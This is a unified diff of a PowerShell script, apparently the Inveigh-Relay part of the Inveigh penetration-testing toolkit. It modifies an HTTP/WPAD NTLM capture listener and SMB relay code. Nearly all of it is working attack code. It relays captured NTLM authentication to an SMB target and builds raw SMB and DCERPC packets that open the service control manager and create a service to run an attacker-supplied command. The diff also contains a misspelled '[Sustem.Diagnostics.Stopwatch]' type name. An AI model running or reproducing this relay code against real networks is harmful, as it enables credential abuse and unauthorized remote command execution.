-if($SMBRelayNetworkTimeout) +if($RunTime -eq 1) { - $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null + $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null +} +elseif($RunTime -gt 1) +{ + $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null } if($ShowHelp -eq 'Y') { - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null + $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null if($inveigh.console_output) { @@ -395,30 +446,36 @@ if($inveigh.status_output) if($inveigh.output_stream_only) { Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } else { - switch ($inveigh.status_queue[0]) + switch -Wildcard ($inveigh.status_queue[0]) { - "Run Stop-Inveigh to stop Inveigh" + "* Disabled Due To *" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + "Run Stop-Inveigh to stop Inveigh-Relay" { Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } "Windows Firewall = Enabled" { Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } default { Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } } @@ -432,44 +489,41 @@ if($inveigh.status_output) $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) $process_ID = $process_ID -replace "-00-00","" -[Byte[]] $inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} +[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} # Begin ScriptBlocks # Shared Basic functions ScriptBlock $shared_basic_functions_scriptblock = { - function DataToUInt16($field) - { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt16($field,0) - } - function DataToUInt32($field) + function DataLength2 { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt32($field,0) + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length } - function DataLength + function DataLength4 { param ([Int]$length_start,[Byte[]]$string_extract_data) - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) + $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) return $string_length } function DataToString { - param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data) + param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data) - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)]) + $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)]) $string_data = $string_data -replace "-00","" $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $string_extract = New-Object System.String ($string_data,0,$string_data.Length) - return $string_extract } + } # SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response @@ -571,7 +625,7 @@ $SMB_relay_challenge_scriptblock = if($SMBRelayNetworkTimeout) { - $SMB_relay_challenge_timeout = new-timespan -Seconds $SMBRelayNetworkTimeout + $SMB_relay_challenge_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout $SMB_relay_challenge_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while(!$SMB_relay_challenge_stream.DataAvailable) @@ -644,33 +698,33 @@ $SMB_relay_response_scriptblock = :SMB_relay_response_loop while ($j -lt 1) { $SMB_relay_response_send = 0x00,0x00 + - $SMB_netbios_length + - 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00, - 0x00,0x00 + - $SMB_blob_length + - 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + - $SMB_byte_count + - 0xa1,0x82 + - $SMB_length_1 + - 0x30,0x82 + - $SMB_length_2 + - 0xa2,0x82 + - $SMB_length_3 + - 0x04,0x82 + - $SMB_NTLMSSP_length + - $HTTP_request_bytes + - 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00 + $SMB_netbios_length + + 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00, + 0x00,0x00 + + $SMB_blob_length + + 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + + $SMB_byte_count + + 0xa1,0x82 + + $SMB_length_1 + + 0x30,0x82 + + $SMB_length_2 + + 0xa2,0x82 + + $SMB_length_3 + + 0x04,0x82 + + $SMB_NTLMSSP_length + + $HTTP_request_bytes + + 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00 $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length) $SMB_relay_response_stream.Flush() if($SMBRelayNetworkTimeout) { - $SMB_relay_response_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout + $SMB_relay_response_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout $SMB_relay_response_stopwatch = [Sustem.Diagnostics.Stopwatch]::StartNew() while(!$SMB_relay_response_stream.DataAvailable) @@ -751,45 +805,45 @@ $SMB_relay_execute_scriptblock = 0 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00, - 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00, - 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30, - 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00 + 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0xff,0xff + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00, + 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30, + 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00 } 1 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00, - 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08, - 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 + 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08, + 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 } 2 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00, - 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0, - 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, - 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38, - 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c, - 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00, - 0x00 + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00, + 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0, + 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, + 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38, + 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c, + 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00, + 0x00 $SMB_multiplex_id = 0x05 } @@ -802,18 +856,18 @@ $SMB_relay_execute_scriptblock = 4 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00, - 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00 + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, + 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00, + 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + + $SMB_service_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00 $SMB_multiplex_id = 0x07 } @@ -825,39 +879,39 @@ $SMB_relay_execute_scriptblock = 6 { - $SMB_relay_execute_send = [Array] 0x00 + - $SMB_service_data_length_bytes + - 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00 + - $SMB_service_byte_count_bytes + - 0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x3f,0x00,0x00,0x00,0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c, - 0x00 + - $SMB_context_handler + - 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00 + - $SMB_referent_ID_bytes + - 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00 + - $SMB_relay_command_length_bytes + - 0x00,0x00,0x00,0x00 + - $SMB_relay_command_length_bytes + - $SMB_relay_command_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00 + $SMB_relay_execute_send = [Array]0x00 + + $SMB_service_data_length_bytes + + 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00 + + $SMB_service_byte_count_bytes + + 0x00,0x00 + + $SMB_service_byte_count_bytes + + 0x3f,0x00,0x00,0x00,0x00,0x00 + + $SMB_service_byte_count_bytes + + 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 + + $SMB_service_byte_count_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c, + 0x00 + + $SMB_context_handler + + 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + + $SMB_service_bytes + + 0x00,0x00 + + $SMB_referent_ID_bytes + + 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + + $SMB_service_bytes + + 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00 + + $SMB_relay_command_length_bytes + + 0x00,0x00,0x00,0x00 + + $SMB_relay_command_length_bytes + + $SMB_relay_command_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00 $SMB_multiplex_id = 0x09 } @@ -871,17 +925,17 @@ $SMB_relay_execute_scriptblock = 8 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00, - 0x00,0x00,0x00,0x13,0x00 + - $SMB_context_handler + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00, + 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00, + 0x00,0x00,0x00,0x13,0x00 + + $SMB_context_handler + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 } 9 @@ -892,16 +946,16 @@ $SMB_relay_execute_scriptblock = 10 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00, - 0x00,0x00,0x00,0x02,0x00 + - $SMB_context_handler + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, + 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00, + 0x00,0x00,0x00,0x02,0x00 + + $SMB_context_handler } 11 @@ -916,7 +970,7 @@ $SMB_relay_execute_scriptblock = if($SMBRelayNetworkTimeout) { - $SMB_relay_execute_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout + $SMB_relay_execute_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout $SMB_relay_execute_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while(!$SMB_relay_execute_stream.DataAvailable) @@ -1052,25 +1106,26 @@ $SMB_relay_execute_scriptblock = # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener $HTTP_scriptblock = { - param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth) + param ($Challenge,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth) function NTLMChallengeBase64 { + param ([String]$Challenge) $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - if($Inveigh.challenge) + if($Challenge) { - $HTTP_challenge = $Inveigh.challenge - $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } else { - $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $HTTP_challenge = $HTTP_challenge_bytes -replace ' ','' $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } @@ -1078,19 +1133,19 @@ $HTTP_scriptblock = $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a + 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, + 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, + 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, + 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, + 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, + 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, + 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, + 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 @@ -1185,9 +1240,9 @@ $HTTP_scriptblock = $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-","" $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000") $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2 - $SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes + $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)] - $SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes + $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)] $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)] $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] @@ -1212,13 +1267,13 @@ $HTTP_scriptblock = } else { - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 $Challenge } } else { - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 $Challenge } $inveigh.response.StatusCode = 401 @@ -1226,10 +1281,10 @@ $HTTP_scriptblock = elseif ($HTTP_request_bytes[8] -eq 3) { $NTLM = 'NTLM' - $HTTP_NTLM_offset = $HTTP_request_bytes[24] - $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes - $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes - $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes + $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes + $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes + $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) @@ -1240,13 +1295,15 @@ $HTTP_scriptblock = } else { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes + $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes } - $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length 